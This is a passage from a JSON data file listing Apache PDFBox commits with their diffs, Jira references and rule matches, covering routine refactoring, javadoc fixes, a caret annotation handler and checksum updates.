double height = top - bottom;", - " double cloudRadius = getEllipseCloudRadius();", - "@@ -843,3 +858,4 @@ class CloudyBorder", - " Point2D.Double p2 = flatPolygon[i + 1];", - "- double dx = p2.x - p1.x, dy = p2.y - p1.y;", - "+ double dx = p2.x - p1.x;", - "+ double dy = p2.y - p1.y;", - " double length = p1.distance(p2);", - "@@ -852,3 +868,4 @@ class CloudyBorder", - " {", - "- double cos = cosine(dx, length), sin = sine(dy, length);", - "+ double cos = cosine(dx, length);", - "+ double sin = sine(dy, length);", - " double d = curlAdvance - lengthRemain;", - "@@ -888,3 +905,4 @@ class CloudyBorder", - " numPoints = centerPointsIndex;", - "- double anglePrev = 0, alphaPrev = 0;", - "+ double anglePrev = 0;", - "+ double alphaPrev = 0;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "e4b704f7bd8eba6c6fcd90ac261844b920cc135e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525924129, - "hunks": 4, - "message": "PDFBOX-4068: fix - use PDAppearanceContentStream class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831299 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index cef278c71..a0146bccf 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -23,3 +23,2 @@ import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "-import org.apache.pdfbox.pdmodel.PDAbstractContentStream;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "@@ -405,3 +404,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " */", - "- private void drawArrow(PDAbstractContentStream cs, float x, float y, float len) throws IOException", - "+ private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", - " {", - "@@ -426,3 +425,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " */", - "- private void drawDiamond(PDAbstractContentStream cs, float x, float y, float r) throws IOException", - "+ private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - " {", - "@@ -445,3 +444,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " */", - "- private void addCircle(PDAbstractContentStream cs, float x, float y, float r) throws IOException", - "+ private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - " {" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4068": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4068", - "relevance": 2 - } - ] - }, - { - "commit_id": "56eb8ac27d9a8319fefa6c13c8786f125c3f807b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523283779, - "hunks": 1, - "message": "PDFBOX-4184: complete comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828724 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "index 475437112..28210f3db 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -188,3 +188,3 @@ public final class LosslessFactory", - " int dataType = alphaRaster.getDataBuffer().getDataType();", - "- // for 16 it images we need to ", - "+ // for 16 bit images divide by 256 ", - " int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4184": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4184", - "relevance": 2 - } - ] - }, - { - "commit_id": "7f81b4fbf2512cd572e7e2df82b6e414f79fa470", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1531201507, - "hunks": 1, - "message": "PDFBOX-4256: enhance javadoc comment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835516 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "index 8840fec86..5f31c0667 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java", - "@@ -124,4 +124,6 @@ public abstract class PDButton extends PDTerminalField", - " /**", - "- * Returns the selected value. May be empty if NoToggleToOff is set but there is no value", - "- * selected.", - "+ * Returns the selected value.", - "+ * ", - "+ *

    Off is the default value which will also be returned if the", - "+ * value hasn't been set at all.", - " * " - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDButton.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4256": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4256", - "relevance": 2 - } - ] - }, - { - "commit_id": "09a99a03f198edcac089ffd66ca72fa71e64dc7b", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532463535, - "hunks": 2, - "message": "PDFBOX-4271: use sha512 instead of md5 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836583 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index 51087ebef..17de17e1c 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -124,3 +124,3 @@", - " ${project.build.directory}/pdfs", - "- 9f129c834bc6f9f8dabad4491c4c10ec", - "+ 66bf4ad470b36079c1e0ceca4438053f32649f964fb1de5cd88babce36c5afc0ba6fa7880bc1c9aac791df872cdfc8dc9851bfd3c75ae96786edd8fac61193ae", - " ", - "@@ -138,3 +138,3 @@", - " ${project.build.directory}/pdfs", - "- d8fccb2fea540ab49bef237f3579546b", - "+ a6efe70574dcde3628271fc1d7aa32cc00095334aa9415e5ebfb96cc20e0f79edd040c0290d5a76b4ced4c6a4343ba4af9567bf12eb7cfe3ec70f1a43202c231", - " " - ], - "changed_files": [ - "preflight/pom.xml" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4271": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4271", - "relevance": 2 - } - ] - }, - { - "commit_id": "d88e2be7880de920022f63a8b03078d9c1612d60", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530813924, - "hunks": 3, - "message": "PDFBOX-3353: improve javadoc, remove double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835167 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 8ac1250f8..2be86de09 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -119,5 +119,5 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " *

    ", - "- * This will get the annotations normal appearance content stream,", - "- * to 'draw' to.", - "- * ", - "+ * This will get the annotations normal appearance content stream, to 'draw' to. It will be", - "+ * uncompressed.", - "+ *", - " * @return the appearance entry representing the normal appearance.", - "@@ -127,4 +127,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " {", - "- PDAppearanceEntry appearanceEntry = getNormalAppearance();", - "- return getAppearanceEntryAsContentStream(appearanceEntry, false);", - "+ return getNormalAppearanceAsContentStream(false);", - " }", - "@@ -135,4 +134,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " *

    ", - "- * This will get the annotations normal appearance content stream,", - "- * to 'draw' to.", - "+ * This will get the annotations normal appearance content stream, to 'draw' to.", - " * " - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "e228c77b43cfac041d65218f47987ec323efc4b4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523713689, - "hunks": 2, - "message": "PDFBOX-3809: return early for empty field list; remove rendering test for flatten of specific fields git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829139 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "index 5d47308fa..cb5e01c7c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "@@ -252,2 +252,7 @@ public final class PDAcroForm implements COSObjectable", - " {", - "+ // Nothing to flatten if there are no fields provided", - "+ if (fields.isEmpty()) {", - "+ return;", - "+ }", - "+ ", - " // for dynamic XFA forms there is no flatten as this would mean to do a rendering", - "@@ -284,3 +289,3 @@ public final class PDAcroForm implements COSObjectable", - " for (PDAnnotation annotation: page.getAnnotations())", - "- { ", - "+ { ", - " if (widgetsForPageMap != null && widgetsForPageMap.get(annotation.getCOSObject()) == null)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3809": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3809", - "relevance": 2 - } - ] - }, - { - "commit_id": "f4be122ce9b5b0b2fe41a8b01dcddf06eab48684", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524771375, - "hunks": 1, - "message": "PDFBOX-3353: add //TODO with concept for line endings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830259 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index b07d3823c..c7ad9846e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -160,2 +160,14 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - "+ //TODO line endings (LE) are missing", - "+ // How it could be done by reusing some of the code from ", - "+ // the Line and StrikeOut handlers", - "+ // 1) if the LE is contained in SHORT_STYLES, ", - "+ // shorten the first + last arms with \"this weird old trick\"", - "+ // used in the StrikeOut handler", - "+ // and paint", - "+ // 2) do a transform so that first and last arms are imagined flat", - "+ // (like in Line handler)", - "+ // 3) refactor + reuse the line handler code that draws the ending shapes", - "+ // the alternative would be to apply the transform to the LE shapes directly,", - "+ // which would be more work and produce code difficult to understand", - " contentStream.drawShape(lineWidth, hasStroke, hasBackground);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "01f4fa07020498b4cecfdfbe4642d339a5a26152", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530641778, - "hunks": 2, - "message": "PDFBOX-3353: correct padding git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835009 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "index 052f98b61..a22d3def9 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "@@ -87,4 +87,4 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", - " rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", - "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", - "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", - " annotation.setRectangle(rect);", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "index 48363df3b..6556ee589 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", - "@@ -88,4 +88,4 @@ public class PDUnderlineAppearanceHandler extends PDAbstractAppearanceHandler", - " rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", - "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", - "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width / 2, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width / 2, rect.getUpperRightY()));", - " annotation.setRectangle(rect);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "26cf2ec688c32cb9cf005fcae612bdba0873bfa1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524387071, - "hunks": 4, - "message": "PDFBOX-4189: reorder constructor and fields, use better way to turn off KCMS git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829764 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index 915cd09a4..e1246f380 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -41,6 +41,2 @@ public class BengaliPdfGenerationHelloWorld", - " {", - "- private BengaliPdfGenerationHelloWorld()", - "- { ", - "- }", - "-", - " /**", - "@@ -59,6 +55,16 @@ public class BengaliPdfGenerationHelloWorld", - " {", - "- if (System.getProperty(\"java.version\").startsWith(\"1.8\"))", - "+ try", - " {", - "+ // turns off log info about using KCMS (faster than LCMS) if available", - "+ Class.forName(\"sun.java2d.cmm.kcms.KcmsServiceProvider\");", - " System.setProperty(\"sun.java2d.cmm\", \"sun.java2d.cmm.kcms.KcmsServiceProvider\");", - " }", - "+ catch (ClassNotFoundException e)", - "+ {", - "+ // ignore", - "+ }", - "+ }", - "+", - "+ private BengaliPdfGenerationHelloWorld()", - "+ { ", - " }" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "f4abb495db9b850ca0db27984e26d7974cb7ef23", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523898449, - "hunks": 0, - "message": "[maven-release-plugin] copy for tag 1.8.14 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/tags/1.8.14@1829299 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a48b3adb3386a3e9d9c93f7341aeed113cc95333" - ] - ], - "tags": [ - "1.8.14" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - } - ] - }, - { - "commit_id": "489ad16fcd0de7d959140cbbd8e52337468e0210", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524593000, - "hunks": 4, - "message": "PDFBOX-3353: improve //TODO comment, remove content stream parts that have no effect git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830017 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "index a1610fb33..3422cef96 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "@@ -50,6 +50,8 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- float lineWidth = 1f;", - "- //TODO Adobe creates the /RD entry, but it is unclear how it", - "- // gets the (identical) numbers. The numbers from there are then substracted/added from /BBox", - "- // and used in the translation in the matrix and also for the line width.", - "+ //TODO Adobe creates the /RD entry with a number that is decided by dividing the height by 10,", - "+ // with a maximum result of 5. That number is then substracted from the /BBox", - "+ // values and used in the translation values in the matrix and also for the line width", - "+ // (not used here because it has no effect).", - "+ // Currently, the rendering difference between our content stream and the one from Adobe", - "+ // is minimal, about one pixel line at the bottom.", - "@@ -61,3 +63,2 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.setStrokingColor(getColor());", - "- contentStream.setLineWidth(lineWidth);", - " contentStream.setNonStrokingColor(getColor());", - "@@ -79,7 +80,6 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - " rect.getWidth(), 0);", - "- // closeAndFillAndStroke() would bring a thicker \"thin top\" shape.", - " contentStream.closePath();", - " contentStream.fill();", - "- contentStream.stroke();", - "- //TODO test whether the stroke() and setLineWidth() calls have any effect at all.", - "+ // Adobe has an additional stroke, but it has no effect", - "+ // because fill \"consumes\" the path.", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "bb6863f60089ea5587c182854bf8cf23611e80f5", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524503622, - "hunks": 5, - "message": "PDFBOX-3353: add caret annotation handler git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829909 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "index ef62e1301..a1610fb33 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "@@ -17,6 +17,15 @@ package org.apache.pdfbox.pdmodel.interactive.annotation.handlers;", - "+import java.io.IOException;", - " import org.apache.commons.logging.Log;", - " import org.apache.commons.logging.LogFactory;", - "+import org.apache.pdfbox.pdmodel.common.PDRectangle;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCaret;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", - "+/**", - "+ * Handler to generate the caret annotations appearance.", - "+ *", - "+ * @author Tilman Hausherr", - "+ */", - " public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - "@@ -41,3 +50,42 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- // TODO to be implemented", - "+ float lineWidth = 1f;", - "+ //TODO Adobe creates the /RD entry, but it is unclear how it", - "+ // gets the (identical) numbers. The numbers from there are then substracted/added from /BBox", - "+ // and used in the translation in the matrix and also for the line width.", - "+", - "+ try", - "+ {", - "+ PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ {", - "+ contentStream.setStrokingColor(getColor());", - "+ contentStream.setLineWidth(lineWidth);", - "+ contentStream.setNonStrokingColor(getColor());", - "+ ", - "+ handleOpacity(annotation.getConstantOpacity());", - "+", - "+ PDRectangle rect = getRectangle();", - "+ PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", - "+ annotation.getNormalAppearanceStream().setBBox(bbox);", - "+", - "+ float halfX = rect.getWidth() / 2;", - "+ float halfY = rect.getHeight() / 2;", - "+ contentStream.moveTo(0, 0);", - "+ contentStream.curveTo(halfX, 0,", - "+ halfX, halfY, ", - "+ halfX, rect.getHeight());", - "+ contentStream.curveTo(halfX, halfY, ", - "+ halfX, 0,", - "+ rect.getWidth(), 0);", - "+ // closeAndFillAndStroke() would bring a thicker \"thin top\" shape.", - "+ contentStream.closePath();", - "+ contentStream.fill();", - "+ contentStream.stroke();", - "+ //TODO test whether the stroke() and setLineWidth() calls have any effect at all.", - "+ }", - "+ }", - "+ catch (IOException e)", - "+ {", - "+ LOG.error(e);", - "+ }", - " }", - "@@ -55,2 +103,2 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-}", - "+}", - "\\ No newline at end of file" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "6cdd00dbf73466f1b2d8fae6f06df16da59911e1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528042161, - "hunks": 2, - "message": "PDFBOX-4212: changes to package names were not persisted - fix package name git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832776 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "index 5688ec385..377adb6ed 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/AppearanceStyle.java", - "@@ -16,3 +16,3 @@", - " */", - "-package org.apache.pdfbox.pdmodel.interactive.annotation.text;", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "index c61c8824c..165c8e455 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainText.java", - "@@ -16,3 +16,3 @@", - " */", - "-package org.apache.pdfbox.pdmodel.interactive.annotation.text;", - "+package org.apache.pdfbox.pdmodel.interactive.annotation.layout;" - ], - "changed_files": [ - 